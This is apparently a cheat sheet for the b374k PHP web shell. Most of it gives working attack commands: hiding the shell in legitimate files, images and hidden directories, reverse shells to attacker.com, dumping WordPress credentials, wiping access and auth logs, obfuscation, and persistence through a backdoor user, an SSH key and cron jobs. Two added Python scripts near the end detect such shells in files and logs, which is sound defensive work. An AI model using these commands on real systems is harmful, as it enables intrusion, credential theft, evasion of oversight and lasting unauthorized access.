b374k is a sophisticated PHP web shell used in penetration testing and post-exploitation scenarios. It provides file management, command execution, database interaction, and various network utilities through a single obfuscated PHP file. b374k offers both a web interface and command-line capabilities, making it useful for maintaining access and gathering intelligence on compromised systems.
b374k (originally named “b374k Shell”) is a single-file PHP application that provides:
- Web-based file manager and editor
- Command execution and reverse shell capabilities
- MySQL/database client
- Network utilities (port scanning, network analysis)
- PHP information gathering
- Log file manipulation
- System information collection
b374k is used exclusively in authorized penetration testing and lawful security assessments. Unauthorized access to computer systems is illegal. Always obtain written authorization before using b374k in any context.
```bash
# Clone from repository (if available)
git clone https://github.com/bl4ckh4t/b374k b374k-shell
# Or download from source
wget https://raw.githubusercontent.com/bl4ckh4t/b374k/master/shell.php
# Or find from legitimate security tool repositories
# (Only for authorized penetration testing)
```
```bash
# Upload to web-accessible directory
scp shell.php user@target.com:/var/www/html/admin/
# Or copy to compromised server
cp shell.php /var/www/html/
# Or embed in other files
cat shell.php >> legitimate_file.php
# Use inconspicuous filenames
cp shell.php error.php
cp shell.php index.php
cp shell.php upload.php
# Place in hidden directories
mkdir -p /var/www/html/.git/
cp shell.php /var/www/html/.git/shell.php
```
```text
# Access through browser
http://target.com/shell.php
# With authentication
http://username:password@target.com/shell.php
# Through proxies
http://target.com/shell.php?proxy=http://proxy:8080
```
```php
# b374k may require authentication
# Default credentials vary by version
# Common defaults: admin/admin, shell/shell
# Change password in PHP source
$AUTH_PASSWORD = 'newpassword';
# Bypass authentication (if vulnerable version)
# Some versions have authentication bypass vulnerabilities
```
| Feature | Description |
|---|---|
| File listing | View directory contents with permissions |
| File preview | View text files in web interface |
| Download | Download files from server to attacker machine |
| Upload | Upload files to server |
| Edit | Edit text files inline |
| Delete | Remove files from system |
| Rename | Rename files and directories |
| Permissions | Change file permissions (chmod) |
```bash
# Download sensitive files through interface
# Click file → Download
# Edit PHP files
# Click file → Edit → Modify code → Save
# Create new files
# New File button → Enter filename → Write content
# Delete logs
# Click access_log → Delete
# Change permissions on script
# Click script.php → Permissions → 755 → Apply
# Upload additional PHP shells
# Upload button → Select file → Upload
# Upload compiled binaries
# Upload button → netcat binary → Upload to /tmp/
# Upload multiple files at once
# Select multiple files → Batch upload
```
| Command | Purpose |
|---|---|
| `id` | Get current user and group information |
| `whoami` | Display current user |
| `pwd` | Show current working directory |
| `ls -la` | List files with detailed permissions |
| `uname -a` | Display system information |
| `netstat -tulnp` | Show listening ports and processes |
| `ps aux` | List all running processes |
```bash
# Through web interface command tab
# Enter: cat /etc/passwd
# Execute
# Through command line if accessible
php -r 'system("id");'
# Chained commands
cat /etc/hosts && whoami && pwd
# Pipe output to tools
cat /etc/sudoers | grep NOPASSWD
# Check sudo privileges
sudo -l
# Find SUID binaries
find / -perm -4000 2>/dev/null
# Check kernel version
uname -a
# Look for writable files
find /tmp -type f -writable 2>/dev/null
```
```bash
# Bash reverse shell
bash -i >& /dev/tcp/attacker.com/4444 0>&1
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Netcat reverse shell
nc attacker.com 4444 -e /bin/bash
```
```bash
# On attacker machine
nc -nlvp 4444
# Using socat
socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
# Using metasploit handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker.com
set LPORT 4444
exploit
```
```text
# MySQL connection
Host: localhost
User: root
Password: rootpass
Port: 3306
Database: wordpress
# Click Connect button in web interface
```
| Operation | Description |
|---|---|
| List databases | View all available databases |
| Select database | Choose database to query |
| List tables | View tables in database |
| Execute query | Run arbitrary SQL queries |
| Export data | Dump database contents |
| Modify data | Insert/update/delete records |
```sql
-- List all databases
SHOW DATABASES;
-- Select database
USE wordpress;
-- List tables
SHOW TABLES;
-- Dump user credentials
SELECT user_login, user_pass FROM wp_users;
-- Extract email addresses
SELECT user_email FROM wp_users;
-- Modify admin password
UPDATE wp_users SET user_pass=MD5('newpassword') WHERE ID=1;
```
```text
# Scan target host
Host: 192.168.1.1
Port range: 1-65535
Type: TCP/UDP
# Common ports
80, 443, 22, 21, 3306, 5432, 8080, 8888
```
```bash
# Get network interfaces
ifconfig / ip addr
# Get routing table
route / ip route
# DNS lookup
nslookup domain.com
host domain.com
# Traceroute
traceroute example.com
```
| Command | Information |
|---|---|
| `phpinfo()` | Complete PHP configuration |
| `php -v` | PHP version |
| `extension_loaded()` | Check for extensions |
| `php.ini` | View PHP configuration file |
| `disable_functions` | List disabled functions |
```bash
# Check if exec is disabled
php -r 'echo ini_get("disable_functions");'
# List loaded extensions
php -r 'print_r(get_loaded_extensions());'
# Check safe_mode status
php -r 'echo ini_get("safe_mode");'
# Get memory limit
php -r 'echo ini_get("memory_limit");'
```
```text
# Apache access log
/var/log/apache2/access.log
/var/log/httpd/access_log
# Apache error log
/var/log/apache2/error.log
/var/log/httpd/error_log
# PHP error log
/var/log/php-fpm.log
/var/log/php.log
# System authentication log
/var/log/auth.log
/var/log/secure
```
```bash
# Clear Apache access logs
echo "" > /var/log/apache2/access.log
# Clear auth logs (if root)
echo "" > /var/log/auth.log
# Clear PHP errors
echo "" > /var/log/php.log
# Truncate syslog
truncate -s 0 /var/log/syslog
```
```php
// Change authentication password
$AUTH_PASSWORD = 'ComplexPassword123!';
// Disable certain functions
$DISABLED_FUNCTIONS = array('system', 'exec');
// Change interface appearance
$INTERFACE_COLOR = '#333333';
// Limit accessible directories
$ROOT_DIR = '/var/www/';
```
```text
# Base64 encode the entire shell
base64 shell.php > shell.b64
# PHP obfuscation
php_strip_whitespace() - remove comments
# Variable renaming
$_POST -> $____P0ST
# String concatenation
"system" -> "sys"."tem"
```
```bash
# Add shell to cron jobs
(crontab -l 2>/dev/null; echo "* * * * * php /tmp/shell.php") | crontab -
# Insert into Apache config
echo "RewriteRule ^(.*)$ /shell.php [L]" >> /etc/apache2/.htaccess
# Hide in image files
echo "<?php system($_POST['cmd']); ?>" >> image.jpg
```
```apache
# Hidden .htaccess shell
<FilesMatch "image\.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
```
```text
# Hidden PHP files
.git/shell.php
.svn/shell.php
uploads/shell.php
wp-content/plugins/shell.php
```
```bash
# 1. Check current user and permissions
whoami && id
# 2. Enumerate system
uname -a && cat /etc/os-release
# 3. Find sensitive files
find /home -name "*.txt" -o -name "*.sql" 2>/dev/null
# 4. Check database access
mysql -u root -p -e "SHOW DATABASES;"
```
```bash
# 1. Find SSH keys
find / -name "id_rsa" -o -name "authorized_keys" 2>/dev/null
# 2. Check network connectivity
netstat -tulnp | grep LISTEN
# 3. Scan internal network
nmap -sn 192.168.1.0/24
# 4. Check ARP cache
arp -a
```
```bash
# 1. Create system user
useradd -m -s /bin/bash backdoor
# 2. Add SSH key
mkdir -p /home/backdoor/.ssh/
echo "ssh-rsa AAAA..." > /home/backdoor/.ssh/authorized_keys
# 3. Add cron job
(crontab -l; echo "*/5 * * * * /tmp/agent.sh") | crontab -
# 4. Verify persistence
crontab -l && cat ~/.ssh/authorized_keys
```
```bash
# Look for b374k signatures
grep -r "b374k" /var/www/
# Check for suspicious PHP files
find /var/www -name "*.php" -mtime -1
# Monitor web server logs
tail -f /var/log/apache2/access.log | grep "shell\|cmd\|execute"
# Check process lists
ps aux | grep php | grep -v apache
```
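The four checks above can be combined into one file-system sweep. The following Python scanner is an added example (not part of the original page or of b374k itself): it looks for the b374k name, request data passed straight into an execution function, encoded loaders, the `.htaccess` handler remap and the hidden-directory placements this page describes, and flags recently modified PHP files. The indicator list and the sample inputs are assumptions made for the example.

```python
import os, re, time

# Content indicators taken from the techniques this page describes. This list is an
# assumption for the example, not a complete web-shell signature set.
INDICATORS = [
    ("b374k-signature", re.compile(r"b374k", re.I)),
    ("request-to-exec", re.compile(
        r"\b(system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(POST|GET|REQUEST)\b")),
    ("encoded-loader", re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(")),
]
# .htaccess directives that make a non-PHP extension (e.g. image.jpg) execute as PHP.
HANDLER_REMAP = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\s+application/x-httpd-php",
                           re.I | re.M)
HIDDEN_DIRS = {".git", ".svn"}

def classify(path, text, mtime=None, now=None, recent_secs=86400):
    """Return the reasons one file is suspicious (empty list when none apply)."""
    name = os.path.basename(path)
    parent = os.path.basename(os.path.dirname(path))
    reasons = []
    if name == ".htaccess" and HANDLER_REMAP.search(text):
        reasons.append("htaccess-php-handler-remap")
    if name.lower().endswith(".php"):
        reasons += [label for label, pat in INDICATORS if pat.search(text)]
        if parent in HIDDEN_DIRS:
            reasons.append("php-in-hidden-dir")
        if mtime is not None and (time.time() if now is None else now) - mtime < recent_secs:
            reasons.append("recently-modified")
    return reasons

def scan_tree(root):
    """Walk a web root and return (path, reason) pairs; unreadable files are skipped."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="ignore") as fh:
                    text = fh.read()
                mtime = os.stat(path).st_mtime
            except OSError:
                continue
            findings += [(path, reason) for reason in classify(path, text, mtime)]
    return findings

if __name__ == "__main__":  # usage: python scan.py /var/www/html
    import sys
    for path, reason in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{reason:28} {path}")
```

`recently-modified` on its own is noise on a busy site; it is only meaningful in combination with one of the content findings or a hidden-directory hit.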
```text
# Use non-standard ports
# Access through 8080, 8888, or custom ports
# Obfuscate filename
mv shell.php assets_loader.php
# Hide in legitimate directories
cp shell.php /var/www/html/wp-admin/temp.php
# Use URL encoding
http://target.com/shell.php?cmd=id%20%26%26%20cat%20/etc/passwd
```
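A grep for `shell` or `cmd` in the access log misses exactly the renamed files and URL-encoded parameters listed above. This Python log analyser is an added example (not from the original page or the b374k project): it decodes each request's query string before looking for command-like values, so the filename no longer matters, and it separately notes POST requests to the hiding places this page lists. The log format, the documentation-range IPs and the heuristic patterns are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined-format request line (assumed format, matching the sample below).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Parameter values that look like shell commands: metacharacters, or a common
# interactive command word at the start. Heuristic chosen for this example.
CMD_VALUE = re.compile(r"(&&|\|\||[;|`]|\$\(|^\s*(id|whoami|uname|cat|ls|nc|bash|sh|wget|curl)\b)")
# Directories the page lists as shell hiding places; a POST to PHP there is worth a look.
HIDDEN_DIR_RE = re.compile(r"/(\.git|\.svn|uploads|wp-content/uploads)/[^/]+\.php$")

def decode_params(target):
    """Query parameters of a request target, decoded a second time to catch double encoding."""
    return [(k, unquote(v)) for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]

def flag_line(line):
    """Return a finding dict for one access-log line, or None if nothing stands out."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m.group("target")).path
    if not path.lower().endswith(".php"):
        return None
    hits = [(k, v) for k, v in decode_params(m.group("target")) if CMD_VALUE.search(v)]
    if hits:
        return {"ip": m.group("ip"), "path": path, "reason": "command-like-parameter", "params": hits}
    # POST bodies are not logged, so a shell driven over POST is only visible by
    # where the request went, not by what it carried.
    if m.group("method") == "POST" and HIDDEN_DIR_RE.search(path):
        return {"ip": m.group("ip"), "path": path, "reason": "post-to-hidden-dir", "params": []}
    return None

def suspicious_requests(log_text):
    """All findings for a block of log text, in file order."""
    return [f for f in (flag_line(ln) for ln in log_text.splitlines()) if f]

# Constructed sample lines for a stand-alone run (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /assets_loader.php?cmd=id%20%26%26%20cat%20/etc/passwd HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "POST /.git/shell.php HTTP/1.1" 200 2048
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```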
| Issue | Solution |
|---|---|
| 404 File Not Found | Verify upload location and filename |
| Permission Denied | Check file permissions (should be readable) |
| Functions Disabled | Check php.ini disable_functions setting |
| Database Connection Failed | Verify credentials and network access |
| Authentication Failed | Check password in source code |
```bash
# Check PHP errors
tail -f /var/log/php-fpm.log
# Test PHP execution
php -r 'echo "PHP works";'
# Verify web server access
curl http://target.com/shell.php
# Check disable_functions
curl http://target.com/shell.php?info
```
```text
# Record all access timestamps
# Log all commands executed
# Document findings and data accessed
# Maintain audit trail of activities
```
```bash
# Remove shell file
rm /var/www/html/shell.php
# Clear logs of access
# Restore original file permissions
# Remove added user accounts
# Delete cron jobs
```
Document:
- How shell was deployed
- Access methods used
- Commands executed
- Data accessed
- Recommendations for remediation
- Timeline of activities
| Tool | Comparison |
|---|---|
| Weevely | Python-based, more obfuscated, smaller shell |
| JSP Shells | Java-based, for Java application servers |
| ASP.NET Shells | Windows-focused, requires .NET framework |
| Reverse Shell Scripts | Simpler but less feature-rich |
- Original repository documentation
- OWASP Web Application Security Testing Guide
- Penetration Testing Execution Standard (PTES)
- CWE-94: Improper Control of Generation of Code
- MITRE ATT&CK: T1190 Exploit Public-Facing Application